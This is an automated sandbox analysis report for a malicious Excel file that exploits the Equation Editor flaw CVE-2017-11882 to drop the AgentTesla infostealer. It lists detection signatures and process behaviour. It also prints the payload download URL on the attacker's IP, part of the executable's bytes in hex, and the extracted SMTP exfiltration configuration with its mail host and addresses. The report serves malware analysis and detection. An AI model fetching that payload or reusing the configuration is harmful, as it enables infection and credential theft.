Play interactive tour

Edit tour

Analysis Report 0AX4532QWSA.xlsx

Overview

General Information

Sample Name:	0AX4532QWSA.xlsx
Analysis ID:	339305
MD5:	9b4eeaed62b4b0253a7a3205f771099d
SHA1:	e7340dd8904b13bf4dbf842c56479ffdb969287c
SHA256:	9bbe5843787cdc023cff31aaa88ce4b91e52e013d5e4b543323b7eea2f5f51d3
Tags:	VelvetSweatshopxlsx
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected AntiVM_3

.NET source code contains potential unpacker

Binary contains a suspicious time stamp

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file access)

Adds / modifies Windows certificates

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops certificate files (DER)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 1532 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2528 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2688 cmdline: 'C:\Users\Public\vbc.exe' MD5: 72B76DB11728DD92AA4C3CB45F155B05)

vbc.exe (PID: 960 cmdline: {path} MD5: 72B76DB11728DD92AA4C3CB45F155B05)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2368865648.00000000027E1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2159672026.00000000037E9000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2159254668.00000000027FE000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2688	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 960	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.vbc.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Users\Public\vbc.exe' , CommandLine: 'C:\Users\Public\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\Public\vbc.exe, NewProcessName: C:\Users\Public\vbc.exe, OriginalFileName: C:\Users\Public\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2528, ProcessCommandLine: 'C:\Users\Public\vbc.exe' , ProcessId: 2688

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 191.96.149.225, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2528, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2528, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe

Sigma detected: Executables Started in Suspicious Folder

Show sources

Source: Process started

Sigma detected: Execution in Non-Executable Folder

Show sources

Source: Process started

Sigma detected: Suspicious Program Location Process Starts

Show sources

Source: Process started

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://191.96.149.225/new.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: vbc.exe.960.5.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "", "URL: ": "", "To: ": "oloyeboos@outlook.com", "ByHost: ": "mail.gammavilla.org:587", "Password: ": "", "From: ": "info@gammavilla.org"}

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_00323551
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00329FDDh	4_2_00329F60
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then jmp 00329FDDh	4_2_00329F68

Source: global traffic

DNS query: name: mail.gammavilla.org

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 191.96.149.225:80

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 13 Jan 2021 19:42:45 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Wed, 13 Jan 2021 16:41:58 GMTETag: "c6400-5b8cad158905f"Accept-Ranges: bytesContent-Length: 812032Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 bf 99 b4 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 5a 0c 00 00 08 00 00 00 00 00 00 8e 79 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 79 0c 00 4f 00 00 00 00 80 0c 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0c 00 0c 00 00 00 20 79 0c 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 59 0c 00 00 20 00 00 00 5a 0c 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 05 00 00 00 80 0c 00 00 06 00 00 00 5c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0c 00 00 02 00 00 00 62 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 79 0c 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 ca 00 00 5c 80 00 00 03 00 00 00 4b 00 00 06 40 4b 01 00 e0 2d 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 05 00 42 00 00 00 01 00 00 11 00 73 15 00 00 0a 0a 06 16 16 02 28 16 00 00 0a 0b 12 01 28 17 00 00 0a 02 28 16 00 00 0a 0b 12 01 28 18 00 00 0a 6f 19 00 00 0a 00 02 06 73 1a 00 00 0a 28 1b 00 00 0a 00 02 03 28 1c 00 00 0a 00 2a 22 02 28 1d 00 00 0a 00 2a 00 1b 30 05 00 07 01 00 00 02 00 00 11 00 16 0a 00 72 01 00 00 70 0b 07 28 1e 00 00 0a 0d 09 39 e0 00 00 00 00 07 19 17 19 73 1f 00 00 0a 13 04 11 04 73 20 00 00 0a 13 05 00 38 9f 00 00 00 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 06 11 06 16 9a 6f 22 00 00 0a 72 69 00 00 70 28 23 00 00 0a 13 07 11 07 2c 71 00 11 06 17 9a 6f 22 00 00 0a 02 28 23 00 00 0a 13 08 11 08 2c 5a 00 2b 3a 00 08 17 8d 61 00 00 01 25 16 1f 3d 9d 6f 21 00 00 0a 13 09 11 09 16 9a 6f 22 00 00 0a 72 7b 00 00 70 28 23 00 00 0a 13 0a 11 0a 2c 0c 11 09 17 9a 12 00 28 24 00 00 0a 26 00 11 05 6f 25 00 00 0a 25 0c 72 87 00 00 70 6f 26 00 00

Source: Joe Sandbox View

IP Address: 217.174.152.38 217.174.152.38

Source: Joe Sandbox View	ASN Name: TELEPOINTBG TELEPOINTBG
Source: Joe Sandbox View	ASN Name: MAJESTIC-HOSTING-01US MAJESTIC-HOSTING-01US

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 217.174.152.38:587

Source: global traffic

HTTP traffic detected: GET /new.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 191.96.149.225Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225
Source: unknown	TCP traffic detected without corresponding DNS query: 191.96.149.225

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C5384863.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: mail.gammavilla.org

Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.5.dr	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2370524978.0000000006280000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2368238555.00000000007FC000.00000004.00000020.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: vbc.exe, 00000005.00000003.2257055628.000000000634D000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: vbc.exe, 00000005.00000003.2257073132.00000000062F0000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://gammavilla.org
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://mail.gammavilla.org
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: vbc.exe, 00000005.00000002.2368981504.0000000002861000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.2371956308.0000000007B00000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: vbc.exe, 00000004.00000002.2162756537.0000000004E60000.00000002.00000001.sdmp, vbc.exe, 00000005.00000002.2370083933.0000000005E90000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: vbc.exe, 00000005.00000002.2370543695.00000000062AB000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2368082691.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/U

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a global keyboard hook

Show sources

Source: C:\Users\Public\vbc.exe

Windows user hook set: 0 keyboard low level C:\Users\Public\vbc.exe

Jump to behavior

Source: C:\Users\Public\vbc.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

Jump to dropped file

System Summary:

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: protected documents the yellow above 25 26 27 28 29 30 31 32 33 34 35 36 37 38 " " " "

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_003200E8	4_2_003200E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00322528	4_2_00322528
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00323551	4_2_00323551
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0032B544	4_2_0032B544
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00324598	4_2_00324598
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00327738	4_2_00327738
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00328BEA	4_2_00328BEA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00322518	4_2_00322518
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0032ADA6	4_2_0032ADA6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00326AF0	4_2_00326AF0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003276F0	4_2_003276F0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003242E8	4_2_003242E8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00329F60	4_2_00329F60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00329F68	4_2_00329F68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01147138	4_2_01147138
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01142F28	4_2_01142F28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_01146C78	4_2_01146C78
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007814F8	5_2_007814F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780747	5_2_00780747
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780A38	5_2_00780A38
Source: C:\Users\Public\vbc.exe	Code function: 5_2_007814E8	5_2_007814E8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00780758	5_2_00780758
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA36FE	5_2_00CA36FE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAA898	5_2_00CAA898
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAEA50	5_2_00CAEA50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CACFB8	5_2_00CACFB8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAAD50	5_2_00CAAD50
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA9D08	5_2_00CA9D08
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA70D8	5_2_00CA70D8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA6A90	5_2_00CA6A90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAD6A8	5_2_00CAD6A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAA278	5_2_00CAA278
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA5FC8	5_2_00CA5FC8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CA8DA8	5_2_00CA8DA8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00CAE368	5_2_00CAE368
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA8A8	5_2_049FA8A8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F40F8	5_2_049F40F8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4C30	5_2_049F4C30
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4450	5_2_049F4450
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FD060	5_2_049FD060
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F95B8	5_2_049F95B8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FE115	5_2_049FE115
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FC938	5_2_049FC938
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F86C0	5_2_049F86C0
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F5A08	5_2_049F5A08
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F8F90	5_2_049F8F90
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9320	5_2_049F9320
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9B5A	5_2_049F9B5A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F8378	5_2_049F8378
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAC83	5_2_049FAC83
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA8C9	5_2_049FA8C9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FACC8	5_2_049FACC8
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB0EC	5_2_049FB0EC
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F40E9	5_2_049F40E9
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB01A	5_2_049FB01A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F5003	5_2_049F5003
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAC3E	5_2_049FAC3E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB05F	5_2_049FB05F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F4440	5_2_049F4440
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F507C	5_2_049F507C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA98F	5_2_049FA98F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FADAD	5_2_049FADAD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049F9B5A	5_2_049F9B5A
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA9D4	5_2_049FA9D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FB1C4	5_2_049FB1C4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FADF2	5_2_049FADF2
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FA90E	5_2_049FA90E
Source: C:\Users\Public\vbc.exe	Code function: 5_2_049FAD0D	5_2_049FAD0D
